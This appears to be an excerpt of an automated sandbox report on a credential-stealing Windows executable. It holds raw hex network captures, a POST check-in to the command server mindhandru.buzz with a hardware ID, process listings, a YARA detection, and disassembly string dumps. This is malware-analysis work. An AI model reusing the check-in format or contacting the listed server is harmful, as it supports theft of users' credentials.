Ascii: <W<7E?Th3&lptfxRc}a47wiGUQ^SDXT;=n#)OSu[e0k^\j[z;7Y> ":7_$$7]GA0(Kb8IuHFZ*]<:5{F_Ggs;bk
2024-12-26 13:14:42 UTC	15331	OUT	Data Raw: 6e 43 4e 78 70 60 44 e0 27 b7 d0 87 eb de da d1 c4 99 bc cb 77 b2 41 4d e0 c8 c2 d0 a7 8c 20 48 82 30 a1 5b 51 75 36 de 32 b2 13 69 38 89 55 41 85 df 27 4c 3e e7 d2 84 6e 60 bb 43 f9 d8 63 13 7f a4 a1 ce 61 bd 8b eb 08 ef 3d e9 75 d1 ff 7b e3 af 43 6a 16 06 4d fa 53 ed 5e 20 fd fc 0d 31 5b 44 fa c6 86 b2 ac f2 e8 14 ec 99 9c 5f ac 3b a6 8a e3 13 3e fe f0 9d f0 89 ed 5a b2 31 dd ef 44 a5 c6 1c c2 44 f9 84 4a d0 4f 63 49 20 79 5c 34 e1 ff 1f ac ff 5b cc e8 6d e0 5d 31 d2 6d 6b 12 f9 47 42 4b 4d f9 11 64 b2 16 3b 2f 0d 7e 6d a0 fb 0b 3d 12 b2 7c b0 91 87 07 eb 2b 4e 4e c8 05 32 76 66 ff 48 04 00 7c 1c 15 70 2a f7 2f 48 c8 8f 67 cb 73 9d 85 d2 ef 4c dd be 54 99 d1 45 7f d4 24 fc 51 e4 52 45 e6 21 8a 00 c1 44 03 9c 3f 8f 20 2a a6 d7 85 98 7c 55 08 7a 31 99 e7 Data Ascii: nCNxp`D'wAM H0[Qu62i8UA'L>n`Cca=u{CjMS^ 1[D_;>Z1DDJOcI y\4[m]1mkGBKMd;/~m=\|+NN2vfH\|p/HgsLTE$QRE!D? \|Uz1
2024-12-26 13:14:42 UTC	15331	OUT	Data Raw: dd 16 de b2 44 54 57 dc 19 58 61 ed d0 89 fb 49 b5 2e 36 2d 8e 88 8a 09 8d 14 e6 bc fa 97 d8 46 1c 6a 34 1d 69 48 14 fb 90 75 3b da 2c 09 74 40 13 05 17 45 cb 6f e3 d7 a3 89 a9 1f e5 2d 71 f0 3b 41 3c 63 66 9c 0f a1 46 24 f6 a1 48 4a 80 7e cc e0 7f 91 76 f7 bf 8d 95 9a 24 88 fd de 55 87 19 21 b1 43 87 89 96 60 e8 18 01 c0 d1 00 34 45 f4 0a 98 7f d4 de ee a9 f3 e0 38 70 7a 71 53 d2 a9 5f 17 41 db 46 52 68 6a 10 17 ea ba 7b 88 11 16 24 38 08 ee d7 51 24 00 83 37 7a f1 d6 7c ab 0c 98 b8 b0 ae cd 6a 17 9e a4 e1 50 52 98 bf 30 d1 20 ca 61 81 b2 23 d5 c2 dc bd fc ac 27 fe 2f 19 a5 eb ce dd 73 7f 94 6a 46 0e fe ba a3 2d 74 c3 a3 3d a8 30 f8 e2 33 88 36 d5 7b 36 69 33 89 0d ce de c1 af 7c 82 d8 2b 51 fb c4 d9 12 23 06 f1 92 d0 ec 47 c9 1e c5 76 65 66 97 44 f1 c3 Data Ascii: DTWXaI.6-Fj4iHu;,t@Eo-q;A<cfF$HJ~v$U!C`4E8pzqS_AFRhj{$8Q$7z\|jPR0 a#'/sjF-t=036{6i3\|+Q#GvefD
2024-12-26 13:14:42 UTC	15331	OUT	Data Raw: 7f 09 40 df cb 6d 82 33 91 84 b8 64 5e ee f9 3b ed 3c f9 fc 76 32 e7 f4 fd 8d f8 ac a4 09 dd 6a 56 56 7c d6 eb 64 aa 08 c8 fb fa 3d 22 7d d8 c6 80 3c fa 01 0e f1 c1 97 1d 63 6a ad d3 2e 12 ac ee 37 07 e1 25 1d ca 9f 25 55 c7 86 26 60 47 55 81 fd 6a c9 9d fa 0a c1 0b 40 35 8d c9 ca 99 61 5e e5 93 ba f5 6e a5 8e f7 bb 89 f2 00 df 90 9b 42 25 5e 39 4f 86 a3 f7 28 bf 12 05 8f 0c 66 56 eb 5a 90 de 63 68 f1 d7 b7 f6 1a e3 b0 50 eb b0 d5 d9 20 3d 36 4b f0 39 8b a5 c1 fb b0 48 da c8 cd 5f 5b 13 48 ed d7 ad d1 e5 a7 cc 72 dc fb bb a7 95 1e e3 6e 11 87 d6 d9 59 0a ab ee c2 82 cc 8d 1c 74 74 7d a2 92 5d e1 3f ff fc eb 06 dc 0f 02 de 45 08 4c 83 1a 0f 6a 0d 92 67 5f 1f f9 93 51 a3 63 a8 e1 9d 8b 8a 3b a7 02 e9 dc 18 97 bd 1b fc 1b 8b e2 86 14 06 eb f5 bc 6e fc fa e4 Data Ascii: @m3d^;<v2jVV\|d="}<cj.7%%U&`GUj@5a^nB%^9O(fVZchP =6K9H_[HrnYtt}]?ELjg_Qc;n
2024-12-26 13:14:42 UTC	15331	OUT	Data Raw: 6d 26 96 45 b3 cf fd 00 f8 b9 6a 8d 83 6a 54 1f ff a8 97 ec 76 e5 e5 5d 09 19 50 86 40 09 a6 a4 5b 85 65 0d 91 58 8f ee 48 6a b0 4f 08 cc 16 55 1f 65 19 1a 5c 7d a9 f6 00 49 15 e9 7c b5 85 2d ac de bf 31 14 3b a6 75 58 77 6c 48 98 20 45 df 27 7d 17 ca 20 6e bc a6 08 4c b8 0a 8c 29 60 39 b9 85 43 da a3 1d 35 a7 83 9d 74 88 78 a0 a9 21 fc 17 2f 05 7f 7a 50 f0 49 24 df 1c 91 13 a6 bc 49 0f 62 9b b3 d3 97 43 62 6a de a7 4a 34 a3 b0 84 c7 d4 4a d5 d0 e6 5b 5a 4f 23 8a f5 22 05 db 82 be f9 7c 08 5a e4 04 9e da 38 fb 1f 52 b3 4c 61 a3 bc 98 48 9d 6e 1d 4d ba 95 fd bb c5 ba 70 7e c5 72 ef d0 f5 7c 43 9d 30 c6 97 47 7c 9a 7b 4b 30 87 94 6c ff 31 e5 6a a9 30 88 dc 67 31 7c 80 1f f4 48 3b 09 22 87 3c cf cb 28 e7 90 35 e9 c4 07 1f 79 77 e1 3a f3 37 33 01 d2 57 d0 4a Data Ascii: m&EjjTv]P@[eXHjOUe\}I\|-1;uXwlH E'} nL)`9C5tx!/zPI$IbCbjJ4J[ZO#"\|Z8RLaHnMp~r\|C0G\|{K0l1j0g1\|H;"<(5yw:73WJ
2024-12-26 13:14:42 UTC	15331	OUT	Data Raw: 40 8c 83 ef 38 be a3 87 d6 d3 4f 17 aa e3 af d1 b4 a6 b4 5f cd 3f 59 23 87 c3 4b a6 d3 0a 07 5b cc 83 18 cd 45 c7 d6 27 ce 7d e7 46 19 47 03 10 56 f4 f2 5b 8d eb ff 8e ca af 23 e8 d2 84 01 71 00 c3 e1 3b 13 a4 bd da b1 ce d4 77 80 cc cb 3e 96 9c 9a 02 e3 37 17 65 35 0b 7e f1 d3 03 ff 39 45 fa 1c 96 14 a2 2e 1a c1 b0 92 20 3b 11 e7 da 4d 51 dd 91 f4 b3 a8 54 3f 36 fe 0f ba 3f 0a 6c 89 b2 db a5 24 03 3a ea 4e af 2a 29 fc 73 26 35 8e 79 da e1 67 a4 b0 cc 01 c1 6f 8a f2 e9 54 ff ed d3 15 e3 46 68 2e 5b 4d db b2 04 39 07 aa 7b f1 69 37 d0 82 ad 63 f4 d6 32 20 b5 8a 9e 34 eb 4f f1 26 b5 f0 fe 3e 5d e3 a2 ba d4 a4 47 d5 dd ff db 2e 3b 23 01 ad 25 12 3f 39 bf 50 23 64 81 25 38 c3 a7 7f fc b6 66 60 73 1a 74 0b 1e c2 2f 7a 69 4a 86 cd 13 db 2a eb 75 d2 8e b0 36 db Data Ascii: @8O_?Y#K[E'}FGV[#q;w>7e5~9E. ;MQT?6?l$:N)s&5ygoTFh.[M9{i7c2 4O&>]G.;#%?9P#d%8f`st/ziJu6
2024-12-26 13:14:42 UTC	15331	OUT	Data Raw: 49 ea 18 b0 c2 92 31 73 87 1b 86 da a0 b7 b5 f7 26 1c 62 0d da 76 7a d1 ec 5a 3b c4 f6 54 74 8b c3 4e 2c 08 91 f3 cb 26 9c 4d a2 a9 ba 1a 25 db 4b 01 73 96 b2 c1 d3 6c 21 51 42 a6 ce e6 ad 93 1e e0 a2 65 66 d9 92 28 e0 3a dd ef 5d 23 8d f4 81 de 8c 4d 96 eb db 10 ea eb 54 4d 28 c3 d4 58 7f 1b bf 5c 44 2e b8 10 f4 e5 87 f0 4d a5 7d ac 9f 8f a8 a8 28 f5 03 3c 5b 68 76 fb ce 80 22 a6 4a e5 55 94 ee 2f 14 7f 41 ec 08 1e 51 f5 41 0a 46 45 46 c7 e9 88 9c d8 49 c9 70 28 1c ec 8f 1a a9 0a 00 fb 26 d8 3c 60 0f 8b fb cf e2 93 0b b8 db 39 cd 9e c8 7c c2 bf 33 ee fa 1a 63 68 6c b9 7a b4 9f 5f 88 33 ce c9 6f 39 b0 8d 0c 5a 4b 3a 18 37 6f 10 da 63 3a 91 b7 e9 37 e1 cd f2 63 8e c9 70 4a 0d d9 5b 33 5a 69 e5 9c 6a 5d 26 83 ea 37 37 2c 8b 32 5e 9c e2 5f aa 5c e8 39 01 47 Data Ascii: I1s&bvzZ;TtN,&M%Ksl!QBef(:]#MTM(X\D.M}(<[hv"JU/AQAFEFIp(&<`9\|3chlz_3o9ZK:7oc:7cpJ[3Zij]&77,2^_\9G
2024-12-26 13:14:46 UTC	1135	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 13:14:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=h2qbov8l3hnm78oinvtof361r5; expires=Mon, 21 Apr 2025 07:01:23 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qcw7%2F%2BwAZw1tfc8Ygp%2BIKIf9Vxz%2BGO3sM65PjCUuT1lQwdI0qoM1B3ysb1k8g8WA9QBjIbAmlod0uUgGsIFDGDRuK38n6YJAuSk1LdpH4HtZIQglTh%2BV3SJf2cL10RjeLuA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8155deabe70cb8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1543&min_rtt=1529&rtt_var=601&sent=323&recv=595&lost=0&retrans=0&sent_bytes=2837&recv_bytes=574530&delivery_rate=1778319&cwnd=179&unsent_bytes=0&cid=eaa22b722bc620bb&ts=4349&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49714	104.21.11.101	443	1868	C:\Users\user\Desktop\0zBsv1tnt4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 13:14:47 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 88 Host: mindhandru.buzz
2024-12-26 13:14:47 UTC	88	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 44 43 42 38 31 36 46 46 37 42 39 46 31 32 38 46 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=DCB816FF7B9F128FBEBA0C6A975F1733
2024-12-26 13:14:48 UTC	1127	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 13:14:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=eljaftgrgdkgu8gp9eiqi90npl; expires=Mon, 21 Apr 2025 07:01:27 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m8OeEjeBr8JK18kSvHKli%2FH2GuHhWeg2aTTr0t6qaTEA%2BKdVHZWemhZUXrd8yNdt2vtPjhORumHSrLglXdpRiWMkD8Hn3lH9iJ0%2BbLQVe6j2VOVhI%2F6ncfWsUnrYVx%2FThro%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f815602fdc043b6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1570&min_rtt=1566&rtt_var=596&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=987&delivery_rate=1823860&cwnd=224&unsent_bytes=0&cid=2a1b35f5ccf21ae6&ts=764&x=0"
2024-12-26 13:14:48 UTC	210	IN	Data Raw: 63 63 0d 0a 63 6a 45 76 76 4f 73 6c 76 56 31 54 4c 43 64 4b 4b 59 48 6c 4e 70 77 6b 64 63 70 7a 78 45 45 68 35 31 4c 4c 43 63 57 53 50 4d 4d 70 53 67 33 4a 79 52 2b 66 4e 53 64 59 56 33 42 31 72 72 6b 5a 72 52 78 41 35 45 48 31 64 41 2f 57 59 2f 67 6e 39 4b 52 67 37 42 31 58 53 65 44 45 51 64 67 37 66 55 6c 66 4c 77 75 74 78 31 44 6f 42 6b 2f 36 58 2b 59 6b 41 39 31 6a 74 69 57 2b 73 45 6e 68 53 42 4e 48 79 4a 39 56 68 77 46 38 63 41 68 37 45 62 54 4c 42 4b 30 52 57 2f 74 43 39 32 38 51 30 51 37 6b 5a 71 50 30 59 4f 77 57 56 45 6d 53 6a 6c 33 59 66 33 38 4f 51 54 34 4c 75 39 55 61 76 6b 46 58 38 45 4f 35 48 41 3d 3d 0d 0a Data Ascii: cccjEvvOslvV1TLCdKKYHlNpwkdcpzxEEh51LLCcWSPMMpSg3JyR+fNSdYV3B1rrkZrRxA5EH1dA/WY/gn9KRg7B1XSeDEQdg7fUlfLwutx1DoBk/6X+YkA91jtiW+sEnhSBNHyJ9VhwF8cAh7EbTLBK0RW/tC928Q0Q7kZqP0YOwWVEmSjl3Yf38OQT4Lu9UavkFX8EO5HA==
2024-12-26 13:14:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49738	13.107.246.63	443	4940	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 13:15:10 UTC	549	OUT	GET /scripts/c/ms.jsll-4.min.js HTTP/1.1 Host: js.monitor.azure.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://learn.microsoft.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Target ID:	0
Start time:	08:14:21
Start date:	26/12/2024
Path:	C:\Users\user\Desktop\0zBsv1tnt4.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\0zBsv1tnt4.exe"
Imagebase:	0x950000
File size:	2'997'760 bytes
MD5 hash:	27E0A573048FADB3DD4B3B2454C8EDA5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1597829853.00000000014E6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1597724019.00000000014E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:14:58
Start date:	26/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Imagebase:	0x7ff678760000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	08:14:59
Start date:	26/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=2040,i,2396547000121627558,15890828269926953277,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff678760000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	08:15:00
Start date:	26/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Imagebase:	0x7ff678760000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:15:01
Start date:	26/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1896,i,7583423197592999893,9247064027029795197,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff678760000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	83.4%
Total number of Nodes:	475
Total number of Limit Nodes:	45

Executed Functions

Function 00962750 Relevance: 268.0, APIs: 3, Strings: 149, Instructions: 2041COMMON

Download Yara Rule

Strings

#, xrefs: 00964061
], xrefs: 00963C32
f, xrefs: 009627B6
%, xrefs: 00964031
c, xrefs: 00963D22
;, xrefs: 00963967
_, xrefs: 00964357
1, xrefs: 00963FD1
\, xrefs: 00963614
_, xrefs: 00963C42
F, xrefs: 0096395F
\, xrefs: 0096473E
m, xrefs: 00963F89
^, xrefs: 00964734
), xrefs: 00964011
!, xrefs: 00964051
%, xrefs: 00963C4A
j, xrefs: 00963413
N, xrefs: 00963FE9
\, xrefs: 009641FF
w, xrefs: 00963D82
:, xrefs: 00963BDA
q, xrefs: 00963D92
5, xrefs: 00963FB1
[, xrefs: 00963C62
G, xrefs: 00963C02
g, xrefs: 00963D02
Z, xrefs: 0096397F
;, xrefs: 00963FA1
}, xrefs: 00963D32
Y, xrefs: 00963C52
u, xrefs: 00963D72
X, xrefs: 00963D4A
], xrefs: 0096360C
~, xrefs: 00962D99
D, xrefs: 0096396F
3, xrefs: 00963FE1
e, xrefs: 00963CF2
a, xrefs: 00963D12
m, xrefs: 00963CB2
6, xrefs: 00962BE4
D, xrefs: 00964136
&, xrefs: 009629D4
<, xrefs: 00962DA3
L, xrefs: 0096392F
k, xrefs: 00962F60
_, xrefs: 00964633
8, xrefs: 00963937
X, xrefs: 0096398F
D, xrefs: 00964578
v, xrefs: 00963C7A
9, xrefs: 00963927
R, xrefs: 00963D8A
=, xrefs: 009634D9
K, xrefs: 00964019
O, xrefs: 00963D5A
^, xrefs: 0096463B
", xrefs: 00964059
., xrefs: 00963C5A
_, xrefs: 00964469
^, xrefs: 00962D94
\, xrefs: 00964481
e, xrefs: 00963C8A
], xrefs: 00964643
], xrefs: 00964739
', xrefs: 00964041
{, xrefs: 00963D62
d, xrefs: 009634B9
S, xrefs: 00963CA2
^, xrefs: 00964471
A, xrefs: 00962F30
_, xrefs: 009635FC
&, xrefs: 00963C3A
\, xrefs: 0096464B
k, xrefs: 00963CE2
0, xrefs: 00963C1A
D, xrefs: 0096456B
j, xrefs: 00962F58
9, xrefs: 00963F91
-, xrefs: 00963B7D
=, xrefs: 00963C0A
C, xrefs: 00963C22
i, xrefs: 00963744
K, xrefs: 00963BE2
?, xrefs: 00963F81
@, xrefs: 0096394F
], xrefs: 00964367
=, xrefs: 00963F71
*, xrefs: 00962A6C
_, xrefs: 0096472F
A, xrefs: 00963C12
n, xrefs: 00962F38
J, xrefs: 00963CDA
+, xrefs: 00964021
E, xrefs: 00963BF2
y, xrefs: 00963D52
., xrefs: 00963B82
a, xrefs: 0096295D
Y, xrefs: 0096281E
_, xrefs: 009641E7
2, xrefs: 00963403
L, xrefs: 00962A71
^, xrefs: 00963604
-, xrefs: 00963FF1
^, xrefs: 009641EF
_, xrefs: 009639A7
1, xrefs: 00963947
H, xrefs: 00962F10
W, xrefs: 00963C82
`, xrefs: 00963588
d, xrefs: 00962EF0
|, xrefs: 00963423
S, xrefs: 00963FC9
/, xrefs: 00964001
/, xrefs: 00963B87
%, xrefs: 00963957
l, xrefs: 00962F48
/, xrefs: 00963C9A
?, xrefs: 00963076
^, xrefs: 0096435F
l, xrefs: 00963987
s, xrefs: 00963DA2
y, xrefs: 009634E9
B, xrefs: 0096393F
, xrefs: 00963C6A
^, xrefs: 0096399F
o, xrefs: 00963997
Q, xrefs: 00963C92
\, xrefs: 009639AF
r, xrefs: 00963D9A
], xrefs: 00964479
\, xrefs: 0096436F
<, xrefs: 009634C9
9, xrefs: 00963977
7, xrefs: 00963FC1
3, xrefs: 00963BEA
U, xrefs: 00963C72
/, xrefs: 00963C2A
2, xrefs: 00962B1F
o, xrefs: 00963CC2
<, xrefs: 0096336C
V, xrefs: 00963D7A
E, xrefs: 00962CB1
], xrefs: 009641F7
h, xrefs: 00962F68
F, xrefs: 00962F20
;, xrefs: 00962F00
~, xrefs: 00963433
i, xrefs: 00963CD2

Memory Dump Source

Source File: 00000000.00000002.1869314685.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.1869287260.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869314685.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869373016.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869396177.00000000009AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869421033.00000000009B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869442568.00000000009B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869565557.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869600432.0000000000B0D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869628952.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869654363.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869679006.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869729918.0000000000B46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869752416.0000000000B48000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869778368.0000000000B61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869810920.0000000000B73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869837743.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869861883.0000000000B93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869884350.0000000000B94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869911133.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869930123.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869950679.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869973538.0000000000BB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1869991607.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870033852.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870074811.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870122737.0000000000BC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870207205.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870239395.0000000000BCA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870368999.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870389059.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870409069.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870437096.0000000000BFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870456192.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870514658.0000000000C41000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870595383.0000000000C42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870617766.0000000000C48000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1870680730.0000000000C58000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_0zBsv1tnt4.jbxd

Similarity

API ID:
String ID: $!$"$#$%$%$%$&$&$'$)$*$+$-$-$.$.$/$/$/$/$0$1$1$2$2$3$3$5$6$7$8$9$9$9$:$;$;$;$<$<$<$=$=$=$?$?$@$A$A$B$C$D$D$D$D$E$E$F$F$G$H$J$K$K$L$L$N$O$Q$R$S$S$U$V$W$X$X$Y$Y$Z$[$\$\$\$\$\$\$\$]$]$]$]$]$]$]$^$^$^$^$^$^$^$^$_$_$_$_$_$_$_$_$`$a$a$c$d$d$e$e$f$g$h$i$i$j$j$k$k$l$l$m$m$n$o$o$q$r$s$u$v$w$y$y${$|$}$~$~
API String ID: 0-1985396431
Opcode ID: 0ae1f3ccf6d0a1670ef8087ec5995949336105e7196e93344b10104bee069ab3
Instruction ID: e6e44827889f5888315984e9ffebeb2c205fbcc287c61e12a7ea50deb21cb28b
Opcode Fuzzy Hash: 0ae1f3ccf6d0a1670ef8087ec5995949336105e7196e93344b10104bee069ab3
Instruction Fuzzy Hash: CD139B3150C7C08AD325DB7884443AFBFE1ABD6314F198E6EE4E987382D7B989458B53

Function 00972E6D Relevance: 47.0, APIs: 2, Strings: 24, Instructions: 1505COMMON

Download Yara Rule

Strings

- $f, xrefs: 00973038
%", xrefs: 0097334A
Fm, xrefs: 009731F2
+A#C, xrefs: 00973D15
rp, xrefs: 00973FF3
s, xrefs: 00972FCA
I, xrefs: 00973048
V], xrefs: 009731FA
].n^, xrefs: 00972F57
mindhandru.buzz, xrefs: 009733BD
9#', xrefs: 00973040
_^]\, xrefs: 00973695
eN, xrefs: 009741BA
=]=_, xrefs: 00973D0E
CNF8, xrefs: 00972F3F
~SS}, xrefs: 00972F37
JOSP, xrefs: 00972F6F
g}zh, xrefs: 00972F27
Q*RG, xrefs: 00972F5F
8]pY, xrefs: 00972EFF
wdnf, xrefs: 00972F07
